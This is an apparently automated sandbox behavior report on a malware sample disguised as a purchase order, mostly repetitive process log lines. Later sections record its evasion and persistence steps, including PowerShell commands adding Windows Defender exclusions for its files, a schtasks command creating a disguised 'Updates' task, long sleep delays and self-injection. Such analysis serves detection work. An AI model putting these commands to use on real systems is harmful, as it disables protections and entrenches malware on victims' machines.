                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess information set: NOGPFAULTERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: PO-0Y9005373R664.exe PID: 6964, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: VvtddClQv.exe PID: 3788, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeMemory allocated: 10D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeMemory allocated: 2A80000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeMemory allocated: 7900000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeMemory allocated: 7310000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeMemory allocated: 8900000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeMemory allocated: 9900000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeMemory allocated: AD0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeMemory allocated: D20000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeMemory allocated: 7160000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeMemory allocated: 6D70000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeMemory allocated: 8160000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeMemory allocated: 9160000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6028Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5606Jump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe TID: 2716Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6880Thread sleep count: 6028 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6920Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6860Thread sleep count: 60 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4780Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6856Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3480Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2668Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe TID: 6216Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe TID: 1468Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeThread delayed: delay time: 60000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULLJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                        Source: PO-0Y9005373R664.exe, 00000009.00000002.2939793723.0000000001428000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                        Source: VvtddClQv.exe, 0000000E.00000002.1819713683.00000000010C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 14_2_0040317B mov eax, dword ptr fs:[00000030h]14_2_0040317B
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 14_2_00402B7C GetProcessHeap,HeapAlloc,14_2_00402B7C
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe"
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VvtddClQv.exe"
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VvtddClQv.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeMemory written: C:\Users\user\Desktop\PO-0Y9005373R664.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeMemory written: C:\Users\user\AppData\Roaming\VvtddClQv.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VvtddClQv.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp"Jump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Users\user\Desktop\PO-0Y9005373R664.exe "C:\Users\user\Desktop\PO-0Y9005373R664.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess created: C:\Users\user\AppData\Roaming\VvtddClQv.exe "C:\Users\user\AppData\Roaming\VvtddClQv.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeQueries volume information: C:\Users\user\Desktop\PO-0Y9005373R664.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
